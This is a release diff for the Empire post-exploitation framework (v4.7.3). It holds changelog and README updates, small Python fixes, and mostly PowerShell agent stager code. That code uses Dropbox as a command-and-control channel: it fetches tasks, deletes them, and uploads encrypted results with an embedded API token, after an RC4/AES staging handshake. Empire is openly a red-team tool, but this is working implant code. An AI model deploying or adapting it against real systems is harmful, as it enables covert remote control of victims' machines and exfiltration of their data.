Merge pull request #604 from BC-SECURITY/release/v4.7.3

v4.7.3 into master

CHANGELOG.md

@@ -7,7 +7,17 @@ and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0
 
 ## [Unreleased]
 
+## [4.7.3] - 2022-08-20
+
+- Added SANS 565 to README (@Cx01N)
+- Fixed error when entering empty line into client (@Cx01N)
+- Fixed Dropbox listener staging issue (@Cx01N)
+- Fixed OneDrive listener staging issue (@Cx01N)
+
+## [4.7.2] - 2022-08-20
+
 ## [4.7.1] - 2022-07-29
+
 -   Fix write_dllhijacker.yaml script_path reference (@kevNii)
 
 ## [4.7.0] - 2022-06-25
@@ -282,7 +292,11 @@ and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0
 -   Updated shellcoderdi to newest version (@Cx01N)
 -   Added a Nim launcher (@Hubbl3)
 
-[Unreleased]: https://github.com/BC-SECURITY/Empire-Sponsors/compare/v4.7.1...HEAD
+[Unreleased]: https://github.com/BC-SECURITY/Empire-Sponsors/compare/v4.7.3...HEAD
+
+[4.7.3]: https://github.com/BC-SECURITY/Empire-Sponsors/compare/v4.7.2...v4.7.3
+
+[4.7.2]: https://github.com/BC-SECURITY/Empire-Sponsors/compare/v4.7.1...v4.7.2
 
 [4.7.1]: https://github.com/BC-SECURITY/Empire-Sponsors/compare/v4.7.0...v4.7.1
 

README.md

@@ -42,10 +42,12 @@ Thank you to the original team of developers: [@harmj0y](https://twitter.com/har
 [@xorrior](https://twitter.com/xorrior)
 
 ## Sponsors
-[<img src="https://user-images.githubusercontent.com/20302208/104083160-41552780-51f1-11eb-8428-3b8cfaf76861.png" width="300"/>](https://www.kali.org/)
+[<img src="https://user-images.githubusercontent.com/20302208/185247407-46b00d46-0468-4600-9c0d-4efeedc38b3b.png" height="100"/>](https://www.kali.org/) &emsp; &emsp; &emsp;
+[<img src="https://user-images.githubusercontent.com/20302208/185246508-56f4f574-5a06-4a2c-ac62-320922588dcf.png" width="100"/>](https://www.sans.org/cyber-security-courses/red-team-operations-adversary-emulation/) &emsp; &emsp; &emsp;
 [<img src="https://user-images.githubusercontent.com/20302208/113086242-219d2200-9196-11eb-8c91-84f19c646873.png" width="100"/>](https://kovert.no/)
 
 ## Release Notes
+
 Please see our [Releases](https://github.com/BC-SECURITY/Empire/releases) or [Changelog](/changelog) page for detailed release notes.
 
 ###  Quickstart

empire/client/client.py

@@ -246,7 +246,9 @@ def main(self):
 
                     cmd_line = list(shlex.split(text))
 
-                    if cmd_line[0] == "resource":
+                    if not cmd_line:
+                        pass
+                    elif cmd_line[0] == "resource":
                         if len(cmd_line) == 1:
                             print(
                                 print_util.color(

empire/server/common/agents.py

@@ -1415,12 +1415,11 @@ def handle_agent_staging(
 
         elif meta == "STAGE2":
             # step 5 of negotiation -> client posts nonce+sysinfo and requests agent
-
-            sessionKey = self.agents[sessionID]["sessionKey"]
-            if isinstance(sessionKey, str):
-                sessionKey = (self.agents[sessionID]["sessionKey"]).encode("UTF-8")
-
             try:
+                sessionKey = self.agents[sessionID]["sessionKey"]
+                if isinstance(sessionKey, str):
+                    sessionKey = (self.agents[sessionID]["sessionKey"]).encode("UTF-8")
+
                 message = encryption.aes_decrypt_and_verify(sessionKey, encData)
                 parts = message.split(b"|")
 

empire/server/common/empire.py

@@ -46,7 +46,7 @@
 )
 from .events import log_event
 
-VERSION = "4.7.1 BC Security Fork"
+VERSION = "4.7.3 BC Security Fork"
 
 
 class MainMenu(cmd.Cmd):

empire/server/data/agent/stagers/dropbox/comms.ps1

@@ -1,6 +1,6 @@
 $Script:APIToken = "{{ api_token}}";
 
-$script:GetTask = {
+$Script:GetTask = {
         try {
             # build the web request object
             $wc= New-Object System.Net.WebClient;
@@ -12,31 +12,31 @@ $script:GetTask = {
                 $wc.Proxy = $Script:Proxy;
             }
 
-            $wc.Headers.Add("User-Agent", $script:UserAgent);
+            $wc.Headers.Add("User-Agent", $Script:UserAgent);
             $Script:Headers.GetEnumerator() | ForEach-Object {$wc.Headers.Add($_.Name, $_.Value)};
 
             $TaskingsFolder = '{{ tasking_folder }}';
             $wc.Headers.Set("Authorization", "Bearer $($Script:APIToken)");
-            $wc.Headers.Set("Dropbox-API-Arg", "{`"path`":`"$TaskingsFolder/$($script:SessionID).txt`"}");
+            $wc.Headers.Set("Dropbox-API-Arg", "{`"path`":`"$TaskingsFolder/$($Script:SessionID).txt`"}");
             $Data = $wc.DownloadData("https://content.dropboxapi.com/2/files/download");
 
             if($Data -and ($Data.Length -ne 0)) {
                 # if there was a tasking data, remove it
                 $wc.Headers.Add("Content-Type", " application/json");
                 $wc.Headers.Remove("Dropbox-API-Arg");
-                $Null=$wc.UploadString("https://api.dropboxapi.com/2/files/delete", "POST", "{`"path`":`"$TaskingsFolder/$($script:SessionID).txt`"}");
+                $Null=$wc.UploadString("https://api.dropboxapi.com/2/files/delete", "POST", "{`"path`":`"$TaskingsFolder/$($Script:SessionID).txt`"}");
                 $Data;
             }
-            $script:MissedCheckins = 0;
+            $Script:MissedCheckins = 0;
         }
         catch {
             if ($_ -match 'Unable to connect') {
-                $script:MissedCheckins += 1;
+                $Script:MissedCheckins += 1;
             }
         }
-    }
+    };
 
-$script:SendMessage = {
+$Script:SendMessage = {
     param($Packets)
 
     if ($Packets)
@@ -59,7 +59,7 @@ $script:SendMessage = {
         }
 
         $wc.Headers.Add('User-Agent', $Script:UserAgent);
-        $Script:Headers.GetEnumerator() | ForEach-Object { { $wc.Headers.Add($_.Name, $_.Value) } };
+        $Script:Headers.GetEnumerator() | ForEach-Object {$wc.Headers.Add($_.Name, $_.Value)};
 
         $ResultsFolder = '{{ results_folder }}';
 
@@ -71,7 +71,7 @@ $script:SendMessage = {
             {
                 $Data = $Null;
                 $wc.Headers.Set("Authorization", "Bearer $( $Script:APIToken )");
-                $wc.Headers.Set("Dropbox-API-Arg", "{`"path`":`"$ResultsFolder/$( $script:SessionID ).txt`"}");
+                $wc.Headers.Set("Dropbox-API-Arg", "{`"path`":`"$ResultsFolder/$( $Script:SessionID ).txt`"}");
                 $Data = $wc.DownloadData("https://content.dropboxapi.com/2/files/download");
             }
             catch
@@ -93,16 +93,16 @@ $script:SendMessage = {
 
             $wc2.Headers.Add("Authorization", "Bearer $( $Script:APIToken )");
             $wc2.Headers.Add("Content-Type", "application/octet-stream");
-            $wc2.Headers.Add("Dropbox-API-Arg", "{`"path`":`"$ResultsFolder/$( $script:SessionID ).txt`"}");
+            $wc2.Headers.Add("Dropbox-API-Arg", "{`"path`":`"$ResultsFolder/$($Script:SessionID).txt`"}");
             $Null = $wc2.UploadData("https://content.dropboxapi.com/2/files/upload", "POST", $RoutingPacket);
-            $script:MissedCheckins = 0;
+            $Script:MissedCheckins = 0;
         }
         catch
         {
             if ($_ -match 'Unable to connect')
             {
-                $script:MissedCheckins += 1;
+                $Script:MissedCheckins += 1;
             }
         }
     }
-}
+};

empire/server/data/agent/stagers/dropbox/dropbox.ps1

@@ -12,105 +12,6 @@
 function Start-Negotiate {
     param($T,$SK,$PI=5,$UA='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko')
 
-    $Script:APIToken = "{{ api_token}}";
-
-    $script:GetTask = {
-            try {
-                # build the web request object
-                $wc= New-Object System.Net.WebClient;
-
-                # set the proxy settings for the WC to be the default system settings
-                $wc.Proxy = [System.Net.WebRequest]::GetSystemWebProxy();
-                $wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials;
-                if($Script:Proxy) {
-                    $wc.Proxy = $Script:Proxy;
-                }
-
-                $wc.Headers.Add("User-Agent", $script:UserAgent);
-                $Script:Headers.GetEnumerator() | ForEach-Object {$wc.Headers.Add($_.Name, $_.Value)};
-
-                $TaskingsFolder = '{{ tasking_folder }}';
-                $wc.Headers.Set("Authorization", "Bearer $($Script:APIToken)");
-                $wc.Headers.Set("Dropbox-API-Arg", "{`"path`":`"$TaskingsFolder/$($script:SessionID).txt`"}");
-                $Data = $wc.DownloadData("https://content.dropboxapi.com/2/files/download");
-
-                if($Data -and ($Data.Length -ne 0)) {
-                    # if there was a tasking data, remove it
-                    $wc.Headers.Add("Content-Type", " application/json");
-                    $wc.Headers.Remove("Dropbox-API-Arg");
-                    $Null=$wc.UploadString("https://api.dropboxapi.com/2/files/delete", "POST", "{`"path`":`"$TaskingsFolder/$($script:SessionID).txt`"}");
-                    $Data;
-                }
-                $script:MissedCheckins = 0;
-            }
-            catch {
-                if ($_ -match 'Unable to connect') {
-                    $script:MissedCheckins += 1;
-                }
-            }
-        }
-
-    $script:SendMessage = {
-            param($Packets)
-
-            if($Packets) {
-                # build and encrypt the response packet
-                $EncBytes = Encrypt-Bytes $Packets;
-
-                # build the top level RC4 "routing packet"
-                # meta 'RESULT_POST' : 5
-                $RoutingPacket = New-RoutingPacket -EncData $EncBytes -Meta 5;
-
-                # build the web request object
-                $wc = New-Object System.Net.WebClient;
-                # set the proxy settings for the WC to be the default system settings
-                $wc.Proxy = [System.Net.WebRequest]::GetSystemWebProxy();
-                $wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials;
-                if($Script:Proxy) {
-                    $wc.Proxy = $Script:Proxy;
-                }
-
-                $wc.Headers.Add('User-Agent', $Script:UserAgent);
-                $Script:Headers.GetEnumerator() | ForEach-Object {{$wc.Headers.Add($_.Name, $_.Value)}};
-
-                $ResultsFolder = '{{ results_folder }}';
-
-                try {
-                    # check if the results file is still in the specified location, if so then
-                    #   download the file and append the new routing packet to it
-                    try {
-                        $Data = $Null;
-                        $wc.Headers.Set("Authorization", "Bearer $($Script:APIToken)");
-                        $wc.Headers.Set("Dropbox-API-Arg", "{`"path`":`"$ResultsFolder/$($script:SessionID).txt`"}");
-                        $Data = $wc.DownloadData("https://content.dropboxapi.com/2/files/download");
-                    }
-                    catch { }
-
-                    if($Data -and $Data.Length -ne 0) {
-                        $RoutingPacket = $Data + $RoutingPacket;
-                    }
-
-                    $wc2 = New-Object System.Net.WebClient;
-                    $wc2.Proxy = [System.Net.WebRequest]::GetSystemWebProxy();
-                    $wc2.Proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials;
-                    if($Script:Proxy) {
-                        $wc2.Proxy = $Script:Proxy;
-                    }
-
-                    $wc2.Headers.Add("Authorization", "Bearer $($Script:APIToken)");
-                    $wc2.Headers.Add("Content-Type", "application/octet-stream");
-                    $wc2.Headers.Add("Dropbox-API-Arg", "{`"path`":`"$ResultsFolder/$($script:SessionID).txt`"}");
-                    $Null = $wc2.UploadData("https://content.dropboxapi.com/2/files/upload", "POST", $RoutingPacket);
-                    $script:MissedCheckins = 0;
-                }
-                catch {
-                    if ($_ -match 'Unable to connect') {
-                        $script:MissedCheckins += 1;
-                    }
-                }
-            }
-        }
-
     function ConvertTo-RC4ByteStream {
         Param ($RCK, $In)
         begin {
@@ -130,7 +31,7 @@ function Start-Negotiate {
                 $Byte -bxor $S[($S[$I] + $S[$J]) % 256];
             }
         }
-    }
+    };
 
     function Decrypt-Bytes {
         param ($Key, $In)
@@ -154,23 +55,23 @@ function Start-Negotiate {
             $AES.IV = $IV;
             ($AES.CreateDecryptor()).TransformFinalBlock(($In[16..$In.length]), 0, $In.Length-16)
         }
-    }
+    };
 
     # make sure the appropriate assemblies are loaded
     $Null = [Reflection.Assembly]::LoadWithPartialName("System.Security");
     $Null = [Reflection.Assembly]::LoadWithPartialName("System.Core");
 
     # try to ignore all errors
     $ErrorActionPreference = "SilentlyContinue";
-    $e=[System.Text.Encoding]::UTF8;
+    $e = [System.Text.Encoding]::UTF8;
 
-    $SKB=$e.GetBytes($SK);
+    $SKB = $e.GetBytes($SK);
     # set up the AES/HMAC crypto
     # $SK -> staging key for this server
     $AES=New-Object System.Security.Cryptography.AesCryptoServiceProvider;
     $IV = [byte] 0..255 | Get-Random -count 16;
-    $AES.Mode="CBC";
-    $AES.Key=$SKB;
+    $AES.Mode = "CBC";
+    $AES.Key = $SKB;
     $AES.IV = $IV;
 
     $hmac = New-Object System.Security.Cryptography.HMACSHA256;
@@ -211,7 +112,7 @@ function Start-Negotiate {
     #   meta = STAGE1 (2)
     #   extra = (0x00, 0x00)
     #   length = len($eb)
-    $IV=[BitConverter]::GetBytes($(Get-Random));
+    $IV = [BitConverter]::GetBytes($(Get-Random));
     $data = $e.getbytes($ID) + @(0x01,0x02,0x00,0x00) + [BitConverter]::GetBytes($eb.Length);
     $rc4p = ConvertTo-RC4ByteStream -RCK $($IV+$SKB) -In $data;
     $rc4p = $IV + $rc4p + $eb;
@@ -324,6 +225,6 @@ function Start-Negotiate {
 
     # TODO: remove this shitty $server logic
     Invoke-Empire -Servers @('NONE') -StagingKey $SK -SessionKey $key -SessionID $ID -WorkingHours "{{ working_hours }}" -ProxySettings $Script:Proxy;
-}
+};
 # $ser is the server populated from the launcher code, needed here in order to facilitate hop listeners
-Start-Negotiate -T $T -PI "{{ [poll_interval }}" -SK "{{ staging_key }}" -UA $u;
+Start-Negotiate -T $T -PI "{{ poll_interval }}" -SK "{{ staging_key }}" -UA $u;